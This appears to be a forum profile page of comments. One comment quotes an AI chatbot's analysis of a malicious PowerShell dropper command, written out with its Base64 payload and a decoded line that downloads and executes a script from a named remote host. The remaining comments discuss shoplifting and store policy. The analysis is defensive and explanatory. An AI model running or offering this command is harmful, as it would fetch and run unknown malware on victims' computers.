• 3 Posts
  • 57 Comments
Joined 2 years ago
cake
Cake day: June 22nd, 2023

help-circle



  • One of the moments that Ai can be good. I asked googled gemni

    This command is highly malicious and is designed to execute a script downloaded from a remote server. Here’s a breakdown of what each part does:

    • conhost cmd /c: This part starts a new command prompt window (cmd) and then immediately executes the following command (/c) within it. conhost is a legitimate Windows process, but here it’s being used as a wrapper.
    • powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQB3AC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA==: This is the core malicious part.
      • powershell: Invokes the PowerShell interpreter.
      • /ep bypass: This is crucial. /ep stands for “execution policy.” bypass tells PowerShell to bypass its execution policy, meaning it will run any script regardless of the local security settings that might otherwise prevent untrusted scripts from running. This is a common tactic for malware.
      • /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQBhAC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA==: The /e switch indicates that the following string is an encoded command. The string JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQB3AC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA== is a Base64 encoded string. Let’s decode the Base64 string to see the actual PowerShell command: Decoded PowerShell command: $site = Invoke-RestMethod ‘https: //mastraw.top/me/day’; iex $site Now we can fully understand the malicious intent:
    • $site = Invoke-RestMethod ‘# https: //mastraw.top/me/day’: This command uses Invoke-RestMethod to download content from the URL ‘https://mastraw/. top/me/day’ . This URL is likely hosting a malicious PowerShell script or some other form of executable code.
    • ; iex $site: The semicolon acts as a command separator. iex is an alias for Invoke-Expression. This command takes the content downloaded from ‘https://mastraw.top/. /me/day’ (which is stored in the $site variable) and executes it directly as a PowerShell command. In summary, this command is designed to:
    • Bypass PowerShell’s security restrictions.
    • Download a script from a specific remote website ‘(https. ://mastraw.top/me/day)’ .
    • Immediately execute that downloaded script on the victim’s computer. The content of the script downloaded from’ https :// mastraw.top/me/day’ is unknown without accessing that URL, but given the nature of this command, it’s almost certainly malicious. It could be anything from a ransomware dropper, a keylogger, a remote access trojan (RAT), or a cryptocurrency miner. If you encountered this on a computer, it is highly compromised and should be immediately isolated from the network and professionally cleaned or reimaged.

    Edit:added back tick to urls















  • The insurance generally doesn’t kick in unless its 100k plus. It is “planned” for that a certain amount of theft and such will happen,

    As for getting sued, meh, merchant rights protect doing reasonable things. Issue comes up when someone “thinks” someone stole and does shit without thinking. Generally All the stores don’t want to have any type of liability with anyone getting hurt so no touching and/or heavy interacting is in policy


  • Moving to block somebody’s path That I would agree with on being an escalation.

    I have seen a lot of times by just there being a few people around giving the we know and we can see you can make someone ditch all the stuff and (some times) cuss out everyone as they leave.

    I will admit that I would not advise the technique when it looks like someone is going to be very bold and just walk out with items “clearly” stealing (the cable on it still) and the OP story kinda shows why

    Then again anytime I am around a shoplifter doing something like that being very aware of how they are moving or doing is important. Ill do my job but fuck getting hurt for the stuff, nothing in any store is worth it.